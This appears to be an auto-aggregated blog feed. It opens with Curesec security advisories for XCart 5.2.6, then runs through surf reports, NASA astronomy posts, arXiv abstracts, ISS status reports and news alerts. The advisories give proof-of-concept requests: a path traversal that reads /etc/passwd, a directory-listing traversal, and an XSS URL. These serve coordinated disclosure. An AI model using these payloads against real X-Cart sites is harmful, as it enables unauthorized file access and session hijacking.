Security Advisory - Curesec Research Team 1. Introduction Affected Product: XCart 5.2.6 Fixed in: 5.2.7 Fixed Version Link: http://ift.tt/1j0phqZ Vendor Contact: support@x-cart.com Vulnerability Type: Path Traversal Remote Exploitable: Yes Reported to vendor: 08/13/2015 Disclosed to public: 11/04/2015 Release mode: Coordinated release CVE: n/a Credits Tim Coen of Curesec GmbH 2. Arbitrary File Download Description When downloading a file, the input is not properly protected against directory traversal, which makes it possible to download arbitrary files. Please note that admin credentials are required. Proof of Concept http://localhost/anew/xcart/skins/admin/en/modules/CDev/TinyMCE/js/tinymce/plugins/filemanager/force_download.php POST: path=/....//....//....//....//....//....//....//....//..etc/passwd&name=download.txt Code /skins/admin/en/modules/CDev/TinyMCE/js/tinymce/plugins/filemanager/force_download.php:10 $path=joinPaths($root,$upload_dir,$_POST['path']); $path=str_replace(LC_DS . '..', '', $path); $name=$_POST['name']; header('Pragma: private'); header('Cache-control: private, must-revalidate'); header("Content-Type: application/octet-stream"); header("Content-Length: " .(string)(filesize($path)) ); header('Content-Disposition: attachment; filename="'.($name).'"'); readfile($path); 3. List Directories Description It is possible to list the directories contained by any directory due to a directory traversal vulnerability via the fldr POST argument. This may be used to gather information about the target system. Please note that admin credentials are required. Proof of Concept http://localhost/anew/xcart/skins/admin/en/modules/CDev/TinyMCE/js/tinymce/plugins/filemanager/dialog.php?type=0&editor=mce_0&popup=0&lang=en_EN&field_id=&fldr=../../../../../../ 4. Solution To mitigate this issue please upgrade at least to version 5.2.7: http://ift.tt/1j0phqZ Please note that a newer version might already be available. 5. Report Timeline 08/13/2015 Informed Vendor about Issue 09/03/2015 Vendor Requests more time 10/19/2015 Vendor releases fix 11/04/2015 Disclosed to public Blog Reference: http://ift.tt/1MIfdPr

Source: Gmail -> IFTTT-> Blogger

[FD] XCart 5.2.6: XSS

Security Advisory - Curesec Research Team 1. Introduction Affected Product: XCart 5.2.6 Fixed in: 5.2.7 Fixed Version Link: http://ift.tt/1j0phqZ Vendor Contact: support@x-cart.com Vulnerability Type: XSS Remote Exploitable: Yes Reported to vendor: 08/13/2015 Disclosed to public: 11/04/2015 Release mode: Coordinated release CVE: n/a Credits Tim Coen of Curesec GmbH 2. Vulnerability Description There are multiple XSS vulnerabilities in the dialog.php file. This allows an attacker to execute arbitrary JavaScript in the context of the browser of a victim if the victim clicks on an attacker supplied link or visits an attacker controlled website. With this, it is possible to bypass CSRF protection and thus do anything the victim can do, inject a JavaScript keylogger, or perform phishing attacks. 3. Proof of Concept http://localhost/anew/xcart/skins/admin/en/modules/CDev/TinyMCE/js/tinymce/plugins/filemanager/dialog.php?editor=">&lang=">&field_id=">&fldr=">&type=">4. Solution To mitigate this issue please upgrade at least to version 5.2.7: http://ift.tt/1j0phqZ Please note that a newer version might already be available. 5. Report Timeline 08/13/2015 Informed Vendor about Issue 09/03/2015 Vendor Requests more time 10/19/2015 Vendor releases fix 11/04/2015 Disclosed to public Blog Reference: http://ift.tt/1MdaBiT

Source: Gmail -> IFTTT-> Blogger

[FD] ZTE ADSL modems - Multiple vulnerabilities

[FD] OpenBSD package 'net-snmp' information disclosure

-----BEGIN PGP SIGNED MESSAGE-

Source: Gmail -> IFTTT-> Blogger

[FD] Huawei HG630a and HG630a-50 Modems Default SSH Admin Password

[FD] D-link wireless router DIR-816L – Cross-Site Request Forgery (CSRF) vulnerability

Ocean City, MD's surf is at least 5.24ft high

Maryland-Delaware, November 20, 2015 at 02:00AM

Ocean City, MD Summary
At 2:00 AM, surf min of 5.24ft. At 8:00 AM, surf min of 6.12ft. At 2:00 PM, surf min of 5.82ft. At 8:00 PM, surf min of 6.02ft.

Surf maximum: 6.24ft (1.9m)
Surf minimum: 5.24ft (1.6m)
Tide height: 3.39ft (1.03m)
Wind direction: S
Wind speed: 13.76 KTS


from Surfline http://ift.tt/1kVmigH
via IFTTT

The Tadpoles of IC 410


This telescopic close-up shows off the otherwise faint emission nebula IC 410. It also features two remarkable inhabitants of the cosmic pond of gas and dust below and right of center, the tadpoles of IC 410. Partly obscured by foreground dust, the nebula itself surrounds NGC 1893, a young galactic cluster of stars. Formed in the interstellar cloud a mere 4 million years ago, the intensely hot, bright cluster stars energize the glowing gas. Composed of denser cooler gas and dust, the tadpoles are around 10 light-years long and are likely sites of ongoing star formation. Sculpted by winds and radiation from the cluster stars, their heads are outlined by bright ridges of ionized gas while their tails trail away from the cluster's central region. IC 410 lies some 10,000 light-years away, toward the nebula-rich constellation Auriga. via NASA http://ift.tt/1OIsvOj

Friday, November 13, 2015

Flute Sonata in D minor, A-Wn EM.66 (Anonymous)

Flute Sonata in D minor, A-Wn EM.66 (Anonymous). Free public domain sheet music from ... Composer, Anonymous. Opus/Catalogue Number, A-Wn ...

from Google Alert - anonymous http://ift.tt/1McSdH0
via IFTTT

Fitting a convolution and indexing anonymous functions

Hello, I am trying to fit something that requires a convolution. With matlab, the discrete convolution means that it is only valid for the time over which the ...

from Google Alert - anonymous http://ift.tt/1HIn4fJ
via IFTTT

Anonymous Egg Donors Wanted. Earn up to $7500

Fertility Specialists Medical Group is seeking anonymous egg donors! Visit our website, http://ift.tt/1lINVdQ for the initial application.

from Google Alert - anonymous http://ift.tt/1WRo0p2
via IFTTT

Aesop Interactive LLC Acquired by Anonymous Buyer

An anonymous company based on the US East Coast without ties to the WordPress community is the new owner of Aesop Interactive LLC. Although ...

from Google Alert - anonymous http://ift.tt/1WRo34d
via IFTTT

Police reopen sex assault case after Anonymous posting draws attention

HALIFAX — The Halifax police say they have reopened an investigation into an alleged sexual assault after the group Anonymous posted a call for ...

from Google Alert - anonymous http://ift.tt/1H1iklj
via IFTTT

Anonymous vs. the Islamic State

Anonymous vs. the Islamic State « | Foreign Policy | the Global Magazine of News and Ideas.

from Google Alert - anonymous http://ift.tt/1H1iklf
via IFTTT

Yik Yak as Anonymous as It Seems?

The app is considered to be “by far the most widely adopted, anonymous, location-based applications at schools,” the report states. According to Yik ...

from Google Alert - anonymous http://ift.tt/1Ps2mmN
via IFTTT

Hackers Can Remotely Record and Listen Calls from Your Samsung Galaxy Phones

If you own a Samsung Galaxy Phone – S6, S6 Edge or Note 4, in particular – there are chances that a skilled hacker could remotely intercept your voice calls to listen in and even record all your voice conversations. Two security researchers, Daniel Komaromy of San Francisco and Nico Golde of Berlin, have demonstrated exactly the same during a security conference in Tokyo. The duo


from The Hacker News http://ift.tt/1NQxaMx
via IFTTT

dreamfactorysoftware/.net-sdk

is there a way to obtain an anonymous object using the database api, I'm publishing the tables from an existing system and I don't have and don't want ...

from Google Alert - anonymous http://ift.tt/1MNMyEt
via IFTTT

Chrome Zero-day Exploit leaves MILLIONS of Android devices vulnerable to Remote Hacking

Hackers have found a new way to hack your Android smartphone and remotely gain total control of it, even if your device is running the most up-to-date version of the Android operating system. Security researcher Guang Gong recently discovered a critical zero-day exploit in the latest version of Chrome for Android that allows an attacker to gain full administrative access to the victim's


from The Hacker News http://ift.tt/1PrM1P8
via IFTTT

ISS Daily Summary Report – 11/12/15

Synchronized Position Hold, Engage, Reorient, Experimental Satellites (SPHERES) Slosh: After experiencing issues with SPHERES batteries and a hard drive, the SPHERES Slosh Run today was postponed to a later date.  Ground experts are investigating the source of the problems.   Sleep Log:  Kelly recorded a Sleep Log entry today.  The Sleep ISS-12 experiment monitors ambient light exposure and crew member activity and collects subjective evaluations of sleep and alertness.  The investigation examines the effects of space flight and ambient light exposure on sleep during a year-long mission on the ISS.   Nitrogen/Oxygen Recharge System (NORS) Airlock Interface Kit (AIK) Installation:   Kelly continued with NORS AIK installation by rotating the Airlock Cabin Air Rack downward and installing nitrogen and oxygen hoses.  He then installed the NORS manifold and connecting the power, nitrogen, and oxygen lines to it.  Towards the end of the day, Yui worked with ground teams in order to initiate a leak check of the system, which will continue through Friday afternoon.  NORS provides the capability to refill the US Airlock High Pressure Gas Tanks (HPGTs) with nitrogen and oxygen following Shuttle retirement.  Two Recharge Tank Assemblies (Oxygen and Nitrogen) are manifested onboard the Orbital ATK (OA)-4 Flight scheduled to launch on December 3rd.   Today’s Planned Activities All activities were completed unless otherwise noted. Calf Volume Measurement HRF Urine Sample Collection Reminder – ARED Photo/TV HRF – Sample MELFI Insertion O2/N2 Manual Valve Closure for NORS Installation On MCC GO Regeneration of Micropurification Unit (БМП) Ф2 Cartridge (start) SSIPC Management / ISS Crew Tagup SPHERES – Camera Setup and Video Recording Comm Subsystem [СТТС] routine maintenance (LF path, Comm Panels, and VHF receiver test) Headset Audit NORS N2, O2 Hose Installation SPHERES – Battery Stowage Study of veins in lower extremities Repairs of SM Interior Panel 314 by Installing Overlay Panels – Day 2 SPHERES – Camera Setup and Test Ops Video Footage of Greetings Soyuz 717 Samsung Tablet Charge – start Photography of Contamination on ТПК 717 [СА] external window glass across plane 4 SPHERES – Test Shutdown Cell Biology Experiment Facility (CBEF) – Mouse Habitat Unit (MHU) Interface Unit Installation, Part 1 Photos of CQ panels and windows across plane IV On-orbit hearing assessment using EARQ Soyuz 717 Samsung tablet charging – end CBEF – Mouse Habitat Unit (MHU) Interface Unit Installation, Part 2 Nitrogen/Oxygen Recharge System (NORS) Install Support Beams and Manifold CBEF – Mouse Habitat Unit (MHU) Interface Unit Installation, Part 3 TV Conference with “Good Morning” TV show (S+ Ku-band) SPHERES – Data Downlink Progress 428 (DC1) Stowage Ops with IMS Support VIZIR. Experiment Ops. Tagup with specialists as necessary CWQMK Water Sample Analysis СОЖ Maintenance SM TV analog signal reception test HAM radio session from Columbus HMS – Food Frequency Questionnaire IMS Delta File Prep Photo/TV Camcorder Setup Verification for ARED Exercise Nitrogen Oxygen Recharge System (NORS) Leak Check Initialization JRNL – Journal Entry [Deferred] EHS MCD – In-flight Microbiology Water analysis and data recording VHF2d test from SM (using primary [СТТС] sets) Crew Discretionary Conference On MCC GO Regeneration of БМП Ф2 Absorption Cartridge (end) SPRINT Reminder Preparation of Reports for Roscosmos Web Site and Social Media ECON-M. Observation and Photography URAGAN Observations and Photography   Completed Task List Items None   Ground Activities All activities were completed unless otherwise noted. NORS Leak Checks   Three-Day Look Ahead: Friday, 11/13:  IMAX File D/L, Capillary Beverage, NORS Leak Check completion Saturday, 11/14:  Crew off Duty, Weekly Cleaning Sunday, 11/15: Crew off Duty   QUICK ISS Status – Environmental Control Group:                               Component Status Elektron On Vozdukh Manual [СКВ] 1 – SM Air Conditioner System (“SKV1”) Off [СКВ] 2 – SM Air Conditioner System (“SKV2”) On Carbon Dioxide Removal Assembly (CDRA) Lab Standby Carbon Dioxide Removal Assembly (CDRA) Node 3 Operate Major Constituent Analyzer (MCA) Lab Shutdown Major Constituent Analyzer (MCA) Node 3 Operate Oxygen Generation Assembly (OGA) Process Urine Processing Assembly (UPA) Standby Trace Contaminant Control System (TCCS) Lab Off Trace Contaminant Control System (TCCS) Node 3 Full Up  

from ISS On-Orbit Status Report http://ift.tt/1MrYOLn
via IFTTT

Facebook will Let You Send Self-Destructing Messages with Messenger App

Facebook is planning to offer you the popular Snapchat feature in its Messenger app – 'Self-Destructing' Messages. Yes, Facebook is testing a new feature within its Messenger app that will allow its users to send self-destructing messages. Some Facebook users in France have spotted this new feature in the Messenger app that lets them send messages that only last for an hour. <!--


from The Hacker News http://ift.tt/1WVOeBl
via IFTTT

How to Build a Successful Incident Response Plan

The fight to protect your company’s data isn’t for the faint of heart. As an embattled IT warrior, with more systems, apps, and users to support than ever before, keeping everything up and running is a battle in itself. When it comes to preventing the worst-case scenario from happening, you need all the help you can get, despite your super-hero status. According to SANS, there are 6 key


from The Hacker News http://ift.tt/1PrarrV
via IFTTT

Kenya Morning Moon, Planets and Taurid


On November 8, a waning crescent Moon joined the continuing parade of planets in Earth's early morning skies. Captured here from Amboseli National Park, Kenya, even the overexposed moonlight can't washout brilliant Venus though, lined up near the ecliptic plane with faint Mars and bright Jupiter above. As if Moon and planets aren't enough, a comparably bright Taurid meteor also streaks through the scene. In fact November's Taurid meteor showers have had a high proportion of bright fireballs. Apparently streaming from radiants in Taurus, the meteors are caused by our fair planet's annual passage through debris from Comet 2P/Encke. The comet's dust grains are catching up with Earth's atmosphere at a relatively low speed of about 27 kilometers per second. via NASA http://ift.tt/1O5pLr7

Thursday, November 12, 2015

Deep Multimodal Semantic Embeddings for Speech and Images. (arXiv:1511.03690v1 [cs.CV])

In this paper, we present a model which takes as input a corpus of images with relevant spoken captions and finds a correspondence between the two modalities. We employ a pair of convolutional neural networks to model visual objects and speech signals at the word level, and tie the networks together with an embedding and alignment model which learns a joint semantic space over both modalities. We evaluate our model using image search and annotation tasks on the Flickr8k dataset, which we augmented by collecting a corpus of 40,000 spoken captions using Amazon Mechanical Turk.



from cs.AI updates on arXiv.org http://ift.tt/1SMw8Ba
via IFTTT

Doubly Robust Off-policy Evaluation for Reinforcement Learning. (arXiv:1511.03722v1 [cs.LG])

We study the problem of evaluating a policy that is different from the one that generates data. Such a problem, known as off-policy evaluation in reinforcement learning (RL), is encountered whenever one wants to estimate the value of a new solution, based on historical data, before actually deploying it in the real system, which is a critical step of applying RL in most real-world applications. Despite the fundamental importance of the problem, existing general methods either have uncontrolled bias or suffer high variance. In this work, we extend the so-called doubly robust estimator for bandits to sequential decision-making problems, which gets the best of both worlds: it is guaranteed to be unbiased and has low variance, and as a point estimator, it outperforms the most popular importance-sampling estimator and its variants in most occasions. We also provide theoretical results on the hardness of the problem, and show that our estimator can match the asymptotic lower bound in certain scenarios.



from cs.AI updates on arXiv.org http://ift.tt/1QlaMN5
via IFTTT

Complexity of the Description Logic ALCM. (arXiv:1511.03749v1 [cs.LO])

In this paper we show that the problem of checking consistency of a knowledge base in the Description Logic ALCM is ExpTime-complete. The M stands for meta-modelling as defined by Motz, Rohrer and Severi. To show our main result, we define an ExpTime Tableau algorithm as an extension of an algorithm for checking consistency of a knowledge base in ALC by Nguyen and Szalas.



from cs.AI updates on arXiv.org http://ift.tt/1SMw7gQ
via IFTTT

Characterizing Concept Drift. (arXiv:1511.03816v1 [cs.LG])

Most machine learning models are static, but the world is dynamic, and increasing online deployment of learned models gives increasing urgency to the development of efficient and effective mechanisms to address learning in the context of non-stationary distributions, or as it is commonly called concept drift. However, the key issue of characterizing the different types of drift that can occur has not previously been subjected to rigorous definition and analysis. In particular, while some qualitative drift categorizations have been proposed, few have been formally defined, and the quantitative descriptions required for detailed understanding of learner performance have not existed. We present the first comprehensive framework for quantitative analysis of drift. This supports the development of the first comprehensive set of formal definitions of types of concept drift. The formal definitions clarify ambiguities and identify gaps in previous definitions, giving rise to a new comprehensive taxonomy of concept drift types and a solid foundation for research into mechanisms to detect and address concept drift.



from cs.AI updates on arXiv.org http://ift.tt/1SMw7gO
via IFTTT

IfcWoD, Semantically Adapting IFC Model Relations into OWL Properties. (arXiv:1511.03897v1 [cs.AI])

In the context of Building Information Modelling, ontologies have been identified as interesting in achieving information interoperability. Regarding the construction and facility management domains, several IFC (Industry Foundation Classes) based ontologies have been developed, such as IfcOWL. In the context of ontology modelling, the constraint of optimizing the size of IFC STEP-based files can be leveraged. In this paper, we propose an adaptation of the IFC model into OWL which leverages from all modelling constraints required by the object-oriented structure of IFC schema. Therefore, we do not only present a syntactic but also a semantic adaptation of the IFC model. Our model takes into consideration the meaning of entities, relationships, properties and attributes defined by the IFC standard. Our approach presents several advantages compared to other initiatives such as the optimization of query execution time. Every advantage is defended by means of practical examples and benchmarks.



from cs.AI updates on arXiv.org http://ift.tt/1QlaMMX
via IFTTT

Software Agents with Concerns of their Own. (arXiv:1511.03958v1 [cs.AI])

We claim that it is possible to have artificial software agents for which their actions and the world they inhabit have first-person or intrinsic meanings. The first-person or intrinsic meaning of an entity to a system is defined as its relation with the system's goals and capabilities, given the properties of the environment in which it operates. Therefore, for a system to develop first-person meanings, it must see itself as a goal-directed actor, facing limitations and opportunities dictated by its own capabilities, and by the properties of the environment. The first part of the paper discusses this claim in the context of arguments against and proposals addressing the development of computer programs with first-person meanings. A set of definitions is also presented, most importantly the concepts of cold and phenomenal first-person meanings. The second part of the paper presents preliminary proposals and achievements, resulting of actual software implementations, within a research approach that aims to develop software agents that intrinsically understand their actions and what happens to them. As a result, an agent with no a priori notion of its goals and capabilities, and of the properties of its environment acquires all these notions by observing itself in action. The cold first-person meanings of the agent's actions and of what happens to it are defined using these acquired notions. Although not solving the full problem of first-person meanings, the proposed approach and preliminary results allow us some confidence to address the problems yet to be considered, in particular the phenomenal aspect of first-person meanings.



from cs.AI updates on arXiv.org http://ift.tt/1QlaMMV
via IFTTT

Modeling the Mind: A brief review. (arXiv:1507.01122v2 [cs.AI] UPDATED)

The brain is a powerful tool used to achieve amazing feats. There have been several significant advances in neuroscience and artificial brain research in the past two decades. This article is a review of such advances, ranging from the concepts of connectionism, to neural network architectures and high-dimensional representations. There have also been advances in biologically inspired cognitive architectures of which we will cite a few. We will be positioning relatively specific models in a much broader perspective, while comparing and contrasting their advantages and weaknesses. The projects presented are targeted to model the brain at different levels, utilizing different methodologies.



from cs.AI updates on arXiv.org http://ift.tt/1eAmFOH
via IFTTT

Scaling up Greedy Causal Search for Continuous Variables. (arXiv:1507.07749v2 [cs.AI] UPDATED)

As standardly implemented in R or the Tetrad program, causal search algorithms used most widely or effectively by scientists have severe dimensionality constraints that make them inappropriate for big data problems without sacrificing accuracy. However, implementation improvements are possible. We explore optimizations for the Greedy Equivalence Search that allow search on 50,000-variable problems in 13 minutes for sparse models with 1000 samples on a four-processor, 16G laptop computer. We finish a problem with 1000 samples on 1,000,000 variables in 18 hours for sparse models on a supercomputer node at the Pittsburgh Supercomputing Center with 40 processors and 384 G RAM. The same algorithm can be applied to discrete data, with a slower discrete score, though the discrete implementation currently does not scale as well in our experiments; we have managed to scale up to about 10,000 variables in sparse models with 1000 samples.



from cs.AI updates on arXiv.org http://ift.tt/1KwluxT
via IFTTT

Ravens: RG Marshal Yanda, P Sam Koch named to John Clayton's midseason All-Pro team; open here to see full team (ESPN)

from ESPN http://ift.tt/17lH5T2
via IFTTT

Yik Yak social media service not so anonymous; can reveal user data to police

WASHINGTON — Internet users of the Yik Yak social media app popular among college students aren't nearly as anonymous as they believe: ...

from Google Alert - anonymous http://ift.tt/1LcnFRF
via IFTTT

anonymous-paris

anonymous-paris. 1 Package by anonymous-paris. @anonymous-paris/core-js - v0.0.2 - Anonymous Paris Core js. contact+npm@anonymous.paris ...

from Google Alert - anonymous http://ift.tt/1GYvXBN
via IFTTT

anonymous-paris/core-js

anonymous-paris published 2 minutes ago; 0.0.2 is the latest of 2 releases; github.com/anonymous-paris/anonymous-core-js · GPL-2.0 license ...

from Google Alert - anonymous http://ift.tt/1HKbtaw
via IFTTT

ISS Daily Summary Report – 11/11/15

Nitrogen/Oxygen Recharge System (NORS) Airlock Interface Kit (AIK) Installation:  Kelly prepared the US Airlock in support of NORS AIK install by removing closeout panels and flexible ventilation ducting.  Yui then assisted Kelly with the installation of the NORS primary and redundant power cables.  The NORS AIK activities will continue tomorrow with leak checks extending through Friday.  NORS provides the capability to refill the US Airlock High Pressure Gas Tanks (HPGTs) with nitrogen and oxygen following Shuttle retirement.   Exposed Experiment Handrail Attachment Mechanism (ExHAM) #2 Deploy:  Yui opened the outer hatch and extended the Japanese Experiment Module (JEM) Airlock slide table external to ISS.   The ground operations team then used the JEM Remote Manipulator System (JEMRMS) Small fine Arm (SFA) to retrieve ExHAM#2 from the slide table and set it on the JEM exposed pallet.  ExHAM is a cuboid mechanism equipped with a fixture on the upper surface for grappling by the JEMRMS SFA, and has components on the under surface for attaching the ExHAM to the handrail on the Exposed Facility.  Up to 7 experiment samples can be loaded on the ExHAM upper surface and 13 on the side surfaces.   Mycological Evaluation of Crew Exposure to ISS Ambient Air (Myco):  Shortly after wakeup, Kelly took samples from his nasal cavities, pharynx, saliva and skin for the Myco investigation.  This is the third body sample collection for this one year mission crewmember.  Analysis of the samples will focus on microflora, particularly fungi, which may cause opportunistic infections or allergies if a crewmember’s immunity is compromised on the ISS.   EXPRESS (EXpedite the PRocessing of Experiments to Space Station) Rack 5 Laptop Software Load: Lindgren supported the ongoing software updates to ISS EXPRESS Rack laptops by copying a software load to the EXPRESS Rack 5 laptop.   Cancellation of Plant Gravity Sensing 2 (PGS2) Experiment Run 2:  Japan Aerospace Exploration Agency (JAXA) stopped the second PGS2 run due to failure of the investigation’s seeds to germinate.   Haptics-1:  Lindgren set up equipment and performed experiment protocols for the European Space Agency (ESA) Haptics-1 investigation.  Haptics-1 supports analysis of engineering parameters and the merits of body-grounded versus non-body grounded force feedback to a crewmember within a microgravity environment.  The physiological property analysis will identify changes in human kinesthetic perception and performance in position and force-torque control tasks and in cognitive performance.  The Haptics-1 experiment is performed in two different configurations to evaluate hardware and human performance under varying mounting conditions: wall-mounted on rack seat-tracks and body-mounted in a vest assembly.   Biochemical Profile:  Yui continued his Flight Day 120 collections for the Biochem Profile investigation.  Samples will be stowed in a Minus Eighty Degree Celsius Laboratory Freezer for ISS (MELFI) for return on a later flight. The Biochemical Profile experiment tests blood and urine samples obtained from astronauts before, during, and after spaceflight. Specific proteins and chemicals in the samples are used as biomarkers, or indicators of health. Post-flight analysis yields a database of samples and test results, which scientists can use to study the effects of spaceflight on the body.   Oxygen Generation System (OGS) Recirculation Loop Sample:  Kelly obtained a water sample from the OGS Recirculation Loop for return-to-ground analysis.  A sample was also drawn for a later on-orbit conductivity test, in case the return sample is delayed.  Periodic water samples are returned for chemical, particulate, and microbial analysis in order to determine when total organic carbon remediation should be implemented to avoid risk of irreversible contamination damage to the OGS.   Today’s Planned Activities All activities were completed unless otherwise noted. MYCO – Morning Sample Collection HRF Urine Sample Collection HRF – Sample MELFI Insertion MYCO – Sample MELFI Insertion Reminder – ARED Photo/TV HRF – Sample MELFI Insertion Morning Inspection CONTUR-2. Experiment Session Ops SEISMOPROGNOZ. Downlink data from Control and Data Acquisition Module (МКСД) HDD (start) SPHERES – Battery Replacement JEMRMS RLT Laptop Activation Express Rack ER5 – Copy CLS 10 from SSC Laptop MELF2 – Ice Brick Insertion into Dewar CONTUR-2. De-installation of master arm with adapter from panel 418 JEMAL – Slide Table (ST) Extension to JPM Side Express Rack ER5 – Insertion of USB drive to allow starting of the SW load Audit of Lighting System in RS MRM1 JEMRMS – Start BUS Monitoring HAPTICS-1 – Camera Adjustment and Hardware Setup Access to Allow NORS Equipment Installation Repairs of SM Interior Panel 314 by Installing Overlay Panels – Day 1. Tagup with specialists СД1-7 Lamp Replacement in MRM1 ER5 – Finishing Software Load Repairs of SM Interior Panel 314 by Installing Overlay Panels – Day 1 SPHERES – Procedure Review SPHERES – Familiarization with Experiment Plan ER5 – Insertion of SNFM DVD to allow starting of the SW load Verification of ИП-1 Flow Sensor Position HAP1 – Hardware Activation and Experiment Start Installation of NORS Primary and Redundant Power Cables HRF Urine Sample Collection PAO Hardware Setup Crew Prep for PAO HRF – Sample MELFI Insertion Routing NORS Primary Power Cables TV Conference with Lyceum No.504 Students and Teachers OTKLIK. Hardware Monitoring Routing NORS Redundant Power Cables SPHERES – Battery Replacement HAP1 –  Experiment Ops HRF Urine Sample Collection VELO Exercise, Day 3 HRF – Sample MELFI Insertion JEMAL – JEM Airlock Retraction of slide table from JEF side СОЖ Maintenance Oxygen Generation System (OGS) Water Sample SPHERES – Battery Replacement XF305 Camcorder Setup PGS2 Sample Retrieval from MELFI HAPTICS-1 Experiment Ops PGS2  Retrieval from MELFI On MCC Go Replacement of Navigation Receiver Module НПМ-3 using the spares kit PGS2 – Plant Experiment Unit (PEU) Closeout Ops SM Ventilation System Preventive Maintenance. Group В2 PGS2  Saving Temperature Data HAP1 Hardware Stowage Collect SM and FGB Air Samples Using АК-1М Sampler N1N Mod Kit Hardware Stowage On MCC Go Mate НПМ-3 Telemetry Connectors to БИТС2-12 Replacement of Navigation Receiver Module НПМ-3 using the spares kit – Closeout Ops РСПИ – Onboard Memory Device (БЗУ). БЗУ Test Checkout INTERACTION-2. Experiment Ops On-orbit Hearing Assessment using EARQ SPHERES – Battery Replacement Stopping JERMRS Arm Bus Monitor […]

from ISS On-Orbit Status Report http://ift.tt/1MD8juZ
via IFTTT

ISS Daily Summary Report – 11/10/15

Post Extravehicular Activity (EVA) Activities:  Following completion of EVA #33 on November 6, the crew was given a day off on Monday.  Today, the crew performed cleanup activities, including EVA loop scrubs with water conductivity tests, Extravehicular Mobility Unit (EMU) dry out, EVA tool stow, EVA camera disassembly and US Airlock deconfiguration.   Sally RideEarth Knowledge Acquired by Middle School Students (Sally Ride EarthKAM):  Kornienko installed EarthKAM components in Node 2 yesterday for a week-long imaging session of the Earth.  Students will then be able to remotely control a digital camera mounted on the ISS and use it to take photographs of coastlines, mountain ranges and other interesting features. The EarthKAM team posts the students’ images on the Internet, where the public and participating classrooms can view the Earth from the ISS.   Soret Facet:  The final run of JAXA’s Soret Facet investigation was completed last night.  The Soret effect in fluids is a thermodynamic phenomenon in which different particles respond in different ways to varying temperatures. The effect has been difficult to examine in detail on Earth because of convection effects in gravity conditions.  This is the first investigation to verify Soret conditions in steady and changing conditions that supports a comparison of the Soret effects in microgravity to effects observed on the ground.   Biochemical Profile:  Yui and Lindgren continued their Flight Day 120 collections yesterday and today for the Biochem Profile investigation.  They stowed the samples in a Minus Eighty Degree Celsius Laboratory Freezer for ISS (MELFI) for return on a later flight. The Biochemical Profile experiment tests blood and urine samples obtained from astronauts before, during, and after spaceflight. Specific proteins and chemicals in the samples are used as biomarkers, or indicators of health. Post-flight analysis yields a database of samples and test results, which scientists can use to study the effects of spaceflight on the body.   Fine Motor Skills:  Kelly completed a session of the Fine Motor Skills experiment on Saturday and Kornienko completed one yesterday.  During the experiment, they performed a series of interactive tasks on a touchscreen tablet. This investigation is the first fine motor skills study to measure long-term microgravity exposure, different phases of microgravity adaptation, and sensorimotor recovery after returning to Earth gravity. Fine Motor Skills sessions completed by Kelly and Kornienko will provide data for identification of trends or variations in fine motor performance in microgravity over the duration of their year-long space mission and upon their return to earth.  Kelly’s results will also be compared with a closely matched participant on Earth.   Sleep Log:  Kelly recorded a Sleep Log entry yesterday and another one today.  The Sleep ISS-12 experiment monitors ambient light exposure and crew member activity and collects subjective evaluations of sleep and alertness.  The investigation examines the effects of space flight and ambient light exposure on sleep during a year-long mission on the ISS.   Journals:  Kelly completed a Journals entry on Saturday. The Journals investigation obtains information on behavioral and human issues that are relevant to the design of equipment and procedures used during astronauts during extended-duration missions. Study results provide information used in preparation for future missions to low-Earth orbit and beyond.   Nitrogen/Oxygen Recharge System (NORS) Airlock Interface Kit (AIK) Procedure Review:  This week, the crew will be installing the NORS AIK.  Today, the crew completed a procedure review and gathered equipment in preparation for the installation starting tomorrow.  NORS provides the capability to refill the US Airlock High Pressure Gas Tanks (HPGTs) with nitrogen and oxygen following Shuttle retirement.   Water Sample and Analysis:  Today, Lindgren collected four water samples from the Potable Water Dispenser (PWD) for analysis.  This was a regularly scheduled test to verify water quality.  He stowed one sample for return on Soyuz 43S.  Later he initiated a Total Organic Carbon Analyzer (TOCA) sample analysis and prepared two samples for incubation prior to microbial and coliform analysis and iodine analysis on Thursday.   Waste and Hygiene Compartment (WHC) Status:  On November 3, during a pretreat tank change out, the pretreat bad qual light did not illuminate as expected as plain water from the newly-installed hose passed the sensor.  On Saturday, Yui replaced the pretreat bad qual electronics unit and installed a replacement hose containing water between the pretreat tank and the dose pump.  He then activated the dose pump and the pretreat bad qual light illuminated as expected when plain water passed the sensor.  WHC is now re-connected to the Urine Processing Assembly (UPA) and operating nominally.   Today’s Planned Activities All activities were completed unless otherwise noted. HRF Urine Sample Collection HRF – Sample MELFI Insertion HRF Blood Draw HRF – Blood Sample collection operator assistance Virus Definition File Update on Auxiliary Computer System (ВКС) Laptops HRF Refrigerated Centrifuge Configuration MYCO – Familiarization On MCC Go Regeneration of БМП Ф1 Micropurification Cartridge VIBROLAB. Monitoring hardware activation HRF – Blood Sample Collection Closeout Ops СТТС Configuration for MRM1 PILOT-T. Experiment Ops HRF – Sample MELFI Insertion SPHERES – Battery Replacement US EVA Tool Stow Replacement of MRM1 ГК1 Н1 Pump Pressurization of Elektron Liquid Unit Airlock Deconfig Post EVA EVA Camera Reconfig EMU Cooling Loop Maintenance. HABIT – Experiment Ops Changeout of Dust Filter ПФ1-4 Cartridges in SM (ФГБ1ПГО_4_419_1, bag 429-16 (00068131R) SPHERES – Battery Replacement RGN – Initiate drain into EDV HRF Urine Sample Collection HRF Closeout Ops ISS RS ППС-26 and ППС-31 Plug-in Audit HRF – Sample MELFI Insertion RGN – Terminate water drain into EDV Repairs of SM Interior Panel 313 by Installing Overlay Panels – Day 2 HAPTICS OBT Material Review WRS – Recycle Tank Fill from EDV EMU Cooling Loop Maintenance. MRM1 Comm Reconfig for Nominal Ops WRS Sample Collection 24-hour ECG Monitoring (termination) EMU – Conductivity Test EMU Cooling Loop Maintenance. 24-hour BP monitoring (terminate) Environmental Health System (EHS) – TEPC Rotation SPHERES – Battery Replacement CALCIUM. Experiment Session 13 ТКГ 428 (DC1) Stowage and IMS Ops HRF Urine Sample Collection ДКЦ2Б15 Photography Nitrogen/Oxygen Recharge System (NORS) Task Review HRF – […]

from ISS On-Orbit Status Report http://ift.tt/1HJN1WU
via IFTTT

Board votes to investigate anonymous letter

UNION COUNTY — The discussion of an anonymous letter, an update on UCHS tennis courts and election of board officers were the focus of Monday ...

from Google Alert - anonymous http://ift.tt/1Mpx4al
via IFTTT

FBI reportedly Paid $1 Million to University Researchers for UnMasking Tor Users

The non-profit Tor Project has accused the FBI of paying the security researchers of Carnegie Mellon University (CMU) at least $1 Million to disclose the technique they had discovered that could help them… …Unmask Tor users as well as Reveal their IP addresses as part of a criminal investigation. As evidence, the Tor Project points to the cyber attack that it discovered last year in


from The Hacker News http://ift.tt/1kONAJR
via IFTTT

